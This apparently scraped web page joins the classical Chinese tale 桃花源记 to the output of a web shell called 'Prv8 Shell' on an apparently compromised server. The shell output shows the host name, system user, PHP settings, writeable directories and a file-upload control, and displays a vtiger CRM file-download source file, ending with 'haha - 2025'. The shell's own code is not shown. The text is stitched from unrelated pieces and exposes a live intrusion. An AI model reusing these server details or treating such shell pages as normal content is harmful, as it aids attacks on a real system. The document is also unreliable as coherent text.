晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/akaindir/www/crm/modules/CustomerPortal/apis/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/akaindir/www/crm/modules/CustomerPortal/apis/DownloadFile.php
<?php
/* +**********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.1
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 * ***********************************************************************************/

class CustomerPortal_DownloadFile extends CustomerPortal_API_Abstract {

	function process(CustomerPortal_API_Request $request) {
		global $adb;
		$current_user = $this->getActiveUser();
		$response = new CustomerPortal_API_Response();

		if ($current_user) {
			$parentId = $request->get('parentId');
			$recordId = $request->get('recordId');
			$module = $request->get('module');
			$parentModule = $request->get('parentModule');
			if (!CustomerPortal_Utils::isModuleActive($module)) {
				$response->setError(1404, 'Module is disabled.');
				return $response;
			}

			if (!empty($parentId)) {
				if ($parentModule === 'Faq') {
					if (!($this->isFaqPublished($parentId))) {
						throw new Exception("This Faq is not published", 1412);
						exit;
					}
				} else {
					if (!$this->isRecordAccessible($parentId)) {
						throw new Exception("Parent record not Accessible", 1412);
						exit;
					}
					$relatedRecordIds = $this->relatedRecordIds($module, CustomerPortal_Utils::getRelatedModuleLabel($module, $parentModule), $parentId);


					if (!in_array($recordId, $relatedRecordIds)) {
						throw new Exception("Record not Accessible", 1412);
						exit;
					}
				}
			} else {
				if (!$this->isRecordAccessible($recordId, $module) && $module != 'ModComments') {
					$response->setError(1404, 'Record not accessible');
					return $response;
				}
			}
			$idComponents = vtws_getIdComponents($recordId);
			$id = $idComponents[1];
			if ($module == 'Documents') {
				$query = "SELECT filetype FROM vtiger_notes INNER JOIN vtiger_crmentity ON vtiger_notes.notesid= vtiger_crmentity.crmid 
                          WHERE notesid =? AND vtiger_crmentity.deleted=?";
				$res = $adb->pquery($query, array($id, '0'));
				$filetype = $adb->query_result($res, 0, "filetype");
				$this->updateDownloadCount($id);

				$fileidQuery = 'SELECT attachmentsid FROM vtiger_seattachmentsrel WHERE crmid = ?';
				$fileres = $adb->pquery($fileidQuery, array($id));
				$fileid = $adb->query_result($fileres, 0, 'attachmentsid');

				$filepathQuery = 'SELECT path,name FROM vtiger_attachments WHERE attachmentsid = ?';
				$fileres = $adb->pquery($filepathQuery, array($fileid));
				$filepath = $adb->query_result($fileres, 0, 'path');
				$filename = $adb->query_result($fileres, 0, 'name');
				$filename = decode_html($filename);

				$saved_filename = $fileid."_".$filename;
				$filenamewithpath = $filepath.$saved_filename;
				$filesize = filesize($filenamewithpath);
				$fileDetails = array();
				$fileDetails['fileid'] = $fileid;
				$fileDetails['filename'] = $filename;
				$fileDetails['filetype'] = $filetype;
				$fileDetails['filesize'] = $filesize;
				$fileDetails['filecontents'] = base64_encode(file_get_contents($filenamewithpath));
				$response->setResult($fileDetails);
			} else if ($module == 'ModComments') {
				$attachmentId = $request->get('attachmentId');
				$modCommentsRecordModel = Vtiger_Record_Model::getInstanceById($id, $module);
				$rawAttachmentDetails = $modCommentsRecordModel->getFileDetails($attachmentId);
				//construct path for attachment and get file size and type details
				$attachmentDetails = $rawAttachmentDetails[0];
				$fileid = $attachmentDetails['attachmentsid'];
				$filename = $attachmentDetails['name'];
				$filepath = $attachmentDetails['path'];
				$saved_filename = $fileid."_".$filename;
				$filenamewithpath = $filepath.$saved_filename;
				$filesize = filesize($filenamewithpath);
				$filetype = $attachmentDetails['type'];

				//Construct array with all attachment details
				$fileDetails = array();
				$fileDetails['fileid'] = $fileid;
				$fileDetails['filename'] = $filename;
				$fileDetails['filetype'] = $filetype;
				$fileDetails['filesize'] = $filesize;
				$fileDetails['filecontents'] = base64_encode(file_get_contents($filenamewithpath));
				$response->setResult($fileDetails);
			} else {
				throw new Exception("Download not supported.", 1412);
				exit;
			}
			return $response;
		}
	}

	/**
	 * Function to update the download count of a file
	 */
	function updateDownloadCount($id) {
		global $adb, $log;
		$log->debug("Entering customer portal function updateDownloadCount");
		$updateDownloadCount = "UPDATE vtiger_notes SET filedownloadcount = filedownloadcount+1 WHERE notesid = ?";
		$countres = $adb->pquery($updateDownloadCount, array($id));
		$log->debug("Entering customer portal function updateDownloadCount");
		return true;
	}

}

haha - 2025